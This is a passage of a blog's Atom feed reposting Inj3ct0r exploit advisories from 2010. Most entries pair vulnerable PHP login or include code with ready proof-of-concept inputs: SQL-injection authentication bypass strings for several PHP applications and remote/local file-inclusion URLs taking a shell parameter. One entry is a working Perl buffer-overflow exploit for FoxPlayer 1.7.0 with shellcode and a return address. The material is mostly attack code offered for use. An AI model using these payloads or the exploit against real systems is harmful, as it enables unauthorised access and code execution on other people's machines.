0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[+] Code :&lt;br /&gt; &lt;br /&gt;##################################################################&lt;br /&gt;[page.php]&lt;br /&gt; &lt;br /&gt;require_once($dir_install . $dir_src . "common.php");&lt;br /&gt;##################################################################&lt;br /&gt; &lt;br /&gt;[+] Example :&lt;br /&gt; &lt;br /&gt;##################################################################&lt;br /&gt;[x] RFI :&lt;br /&gt; &lt;br /&gt;  [Izumi_path]/src/page.php?dir_install=[Shell]&lt;br /&gt; &lt;br /&gt;[x] LFI :&lt;br /&gt; &lt;br /&gt;  [Izumi_path]/src/page.php?dir_src=[LFI]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6684481948968834745?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/6684481948968834745/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/izumi-110-rfilfi-multiple-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6684481948968834745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6684481948968834745'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/izumi-110-rfilfi-multiple-include.html' title='Izumi &lt;= 1.1.0 (RFI/LFI) Multiple Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-7117160094783260081</id><published>2010-03-04T10:20:00.001-08:00</published><updated>2010-03-04T10:20:40.256-08:00</updated><title type='text'>Baal Systems &lt;= 3.8 (Auth Bypass) SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[+] Vuln Code :&lt;br /&gt; &lt;br /&gt;[adminlogin.php]&lt;br /&gt; &lt;br /&gt;&lt;?php&lt;br /&gt;include("common.php");&lt;br /&gt;if (!empty($_POST['password'])) {&lt;br /&gt;    $username = $_POST['username'];&lt;br /&gt;    $password = $_POST['password'];&lt;br /&gt; &lt;br /&gt;    $query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";&lt;br /&gt;    $result1 = db_query($query);&lt;br /&gt;    $rows = db_num_rows($result1);&lt;br /&gt;    $row = db_fetch_array($result1);&lt;br /&gt;    if ($rows != 0) {&lt;br /&gt;        if (session_is_registered("whossession")) {&lt;br /&gt;            $_SESSION['who'] = "admin";&lt;br /&gt;            $_SESSION['userrole'] = "admin";&lt;br /&gt;            $_SESSION['username'] = $username;&lt;br /&gt;            $_SESSION['usernum'] = $row["userid"];&lt;br /&gt;            header("location:admin.php");&lt;br /&gt;        } else {&lt;br /&gt;            session_register("whossession");&lt;br /&gt;            $_SESSION['who'] = "admin";&lt;br /&gt;            $_SESSION['userrole'] = "admin";&lt;br /&gt;            $_SESSION['username'] = $username;&lt;br /&gt;            $_SESSION['usernum'] = $row["userid"];&lt;br /&gt;            header("location:admin.php");&lt;br /&gt;        }&lt;br /&gt;    } else {&lt;br /&gt;        header("location:adminlogin.php?error=yes");&lt;br /&gt;    }&lt;br /&gt;} else {&lt;br /&gt; &lt;br /&gt;    ?&gt;&lt;br /&gt; &lt;br /&gt;[+] PoC :&lt;br /&gt; &lt;br /&gt;[BaalSystems_path]/adminlogin.php&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;username: ' or' 1=1&lt;br /&gt;Password: ' or' 1=1[+] Baal Systems &lt;= 3.8 (Auth Bypass) SQL Injection Vulnerability&lt;br /&gt;[+] Discovered by cr4wl3r &lt;cr4wl3r[!]linuxmail.org&gt;&lt;br /&gt; &lt;br /&gt;[+] Vuln Code :&lt;br /&gt; &lt;br /&gt;[adminlogin.php]&lt;br /&gt; &lt;br /&gt;&lt;?php&lt;br /&gt;include("common.php");&lt;br /&gt;if (!empty($_POST['password'])) {&lt;br /&gt;    $username = $_POST['username'];&lt;br /&gt;    $password = $_POST['password'];&lt;br /&gt; &lt;br /&gt;    $query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";&lt;br /&gt;    $result1 = db_query($query);&lt;br /&gt;    $rows = db_num_rows($result1);&lt;br /&gt;    $row = db_fetch_array($result1);&lt;br /&gt;    if ($rows != 0) {&lt;br /&gt;        if (session_is_registered("whossession")) {&lt;br /&gt;            $_SESSION['who'] = "admin";&lt;br /&gt;            $_SESSION['userrole'] = "admin";&lt;br /&gt;            $_SESSION['username'] = $username;&lt;br /&gt;            $_SESSION['usernum'] = $row["userid"];&lt;br /&gt;            header("location:admin.php");&lt;br /&gt;        } else {&lt;br /&gt;            session_register("whossession");&lt;br /&gt;            $_SESSION['who'] = "admin";&lt;br /&gt;            $_SESSION['userrole'] = "admin";&lt;br /&gt;            $_SESSION['username'] = $username;&lt;br /&gt;            $_SESSION['usernum'] = $row["userid"];&lt;br /&gt;            header("location:admin.php");&lt;br /&gt;        }&lt;br /&gt;    } else {&lt;br /&gt;        header("location:adminlogin.php?error=yes");&lt;br /&gt;    }&lt;br /&gt;} else {&lt;br /&gt; &lt;br /&gt;    ?&gt;&lt;br /&gt; &lt;br /&gt;[+] PoC :&lt;br /&gt; &lt;br /&gt;[BaalSystems_path]/adminlogin.php&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;username: ' or' 1=1&lt;br /&gt;Password: ' or' 1=1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7117160094783260081?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/7117160094783260081/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/baal-systems-38-auth-bypass-sql.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7117160094783260081'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7117160094783260081'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/baal-systems-38-auth-bypass-sql.html' title='Baal Systems &lt;= 3.8 (Auth Bypass) SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-3831062213519418530</id><published>2010-03-04T10:19:00.002-08:00</published><updated>2010-03-04T10:20:10.713-08:00</updated><title type='text'>Zen Tracking &lt;= 2.2 (Auth Bypass) SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[+] Vuln Code :&lt;br /&gt; &lt;br /&gt;[userlogin.php]&lt;br /&gt; &lt;br /&gt;if (!empty($_POST['password']))&lt;br /&gt;{&lt;br /&gt;   $username =$_POST['username'];&lt;br /&gt;   $password =$_POST['password'];&lt;br /&gt;   dbConnect();&lt;br /&gt;   $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'".  mysql_error());&lt;br /&gt; &lt;br /&gt;[+] PoC :&lt;br /&gt; &lt;br /&gt;[ZenTracking_path]/userlogin.php&lt;br /&gt; &lt;br /&gt;username: ' or' 1=1&lt;br /&gt;Password: ' or' 1=1&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;[+] Vuln Code :&lt;br /&gt; &lt;br /&gt;[managerlogin.php]&lt;br /&gt; &lt;br /&gt;if (!empty($_POST['password']))&lt;br /&gt;{&lt;br /&gt;   $username =$_POST['username'];&lt;br /&gt;   $password =$_POST['password'];&lt;br /&gt;   dbConnect();&lt;br /&gt;   $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'".  mysql_error());&lt;br /&gt; &lt;br /&gt;[+] PoC :&lt;br /&gt; &lt;br /&gt;[ZenTracking_path]/managerlogin.php&lt;br /&gt; &lt;br /&gt;username: ' or' 1=1&lt;br /&gt;Password: ' or' 1=1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3831062213519418530?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/3831062213519418530/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/zen-tracking-22-auth-bypass-sql.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3831062213519418530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3831062213519418530'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/zen-tracking-22-auth-bypass-sql.html' title='Zen Tracking &lt;= 2.2 (Auth Bypass) SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-7931927196321678655</id><published>2010-03-04T10:19:00.001-08:00</published><updated>2010-03-04T10:19:42.885-08:00</updated><title type='text'>Killmonster &lt;= 2.1 (Auth Bypass) SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[authenticate.php]&lt;br /&gt; &lt;br /&gt;    $isadmin=$_POST['isadmin'];&lt;br /&gt;    $password=$_POST['password'];&lt;br /&gt;    $password=md5($password);&lt;br /&gt;    $query = "select * from km_admins where username='$isadmin' and password='$password'";&lt;br /&gt;    $result = mysql_query($query) ;&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;[+] PoC : [Killmonster_path]/admin/login.php&lt;br /&gt; &lt;br /&gt;username :  ' or' 1=1&lt;br /&gt;password :  ' or' 1=1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7931927196321678655?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/7931927196321678655/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/killmonster-21-auth-bypass-sql.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7931927196321678655'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7931927196321678655'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/killmonster-21-auth-bypass-sql.html' title='Killmonster &lt;= 2.1 (Auth Bypass) SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8727035760670960035</id><published>2010-03-04T10:18:00.000-08:00</published><updated>2010-03-04T10:19:16.431-08:00</updated><title type='text'>EncapsCMS &lt;= 0.3.6 (config[path]) Remote File Include Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[+] Vuln Code : [common_foot.php]&lt;br /&gt; &lt;br /&gt;include($config['path']."idx_foot.html");&lt;br /&gt;if($config["debug"]&gt;0){&lt;br /&gt;&lt;br /&gt;    echo '$_POST:';var_dump($_POST);&lt;br /&gt; &lt;br /&gt;[+] PoC :&lt;br /&gt; &lt;br /&gt;[EncapsCMS_path]/common_foot.php?config[path]=[Shell]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8727035760670960035?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8727035760670960035/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/encapscms-036-configpath-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8727035760670960035'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8727035760670960035'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/encapscms-036-configpath-remote-file.html' title='EncapsCMS &lt;= 0.3.6 (config[path]) Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-3110816603405803062</id><published>2010-03-04T10:17:00.000-08:00</published><updated>2010-03-04T10:18:26.611-08:00</updated><title type='text'>Rostermain &lt;= 1.1 (Auth Bypass) SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[+] Vuln Code :&lt;br /&gt; &lt;br /&gt;[index.php]&lt;br /&gt; &lt;br /&gt;if ($_POST['userid'] &amp;&amp; $_POST['password'])&lt;br /&gt;{&lt;br /&gt;  // if the user has just tried to log in&lt;br /&gt;  $logquery = "select * from users "&lt;br /&gt;           ."where username='$userid' "&lt;br /&gt;           ." and passwd='$password' ";&lt;br /&gt; &lt;br /&gt;[+] PoC :&lt;br /&gt; &lt;br /&gt;username :  ' or' 1=1&lt;br /&gt;password :  ' or' 1=1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3110816603405803062?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/3110816603405803062/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/rostermain-11-auth-bypass-sql-injection.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3110816603405803062'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3110816603405803062'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/rostermain-11-auth-bypass-sql-injection.html' title='Rostermain &lt;= 1.1 (Auth Bypass) SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-3790880347967857721</id><published>2010-03-04T10:16:00.004-08:00</published><updated>2010-03-04T10:17:54.707-08:00</updated><title type='text'>FoxPlayer 1.7.0 (.m3u) Local Buffer Overflow Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt; &lt;br /&gt;print qq(&lt;br /&gt;###########################################################&lt;br /&gt;## FoxPlayer 1.7.0 (.m3u) Local Buffer Overflow Exploit  ##&lt;br /&gt;###########################################################&lt;br /&gt;);&lt;br /&gt;my $junk = "\x41" x 260;&lt;br /&gt;my $eip = "\x28\x55\x3D\x72"; # 0x723D5528 -- dsound.dll -- call esp&lt;br /&gt;my $nopsled = "\x90" x 19;&lt;br /&gt;# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/&lt;br /&gt;my $shellcode =&lt;br /&gt;"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".&lt;br /&gt;"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".&lt;br /&gt;"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".&lt;br /&gt;"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".&lt;br /&gt;"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".&lt;br /&gt;"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".&lt;br /&gt;"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".&lt;br /&gt;"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".&lt;br /&gt;"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".&lt;br /&gt;"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".&lt;br /&gt;"\x51\x92\x42\x83";&lt;br /&gt;##################################################################&lt;br /&gt;open(myfile,'&gt;&gt; Traffic.m3u'); # Dj Tiesto :D&lt;br /&gt;print myfile $junk.$eip.$shellcode.$nopsled;&lt;br /&gt;##################################################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3790880347967857721?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/3790880347967857721/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/foxplayer-170-m3u-local-buffer-overflow.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3790880347967857721'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3790880347967857721'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/foxplayer-170-m3u-local-buffer-overflow.html' title='FoxPlayer 1.7.0 (.m3u) Local Buffer Overflow Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 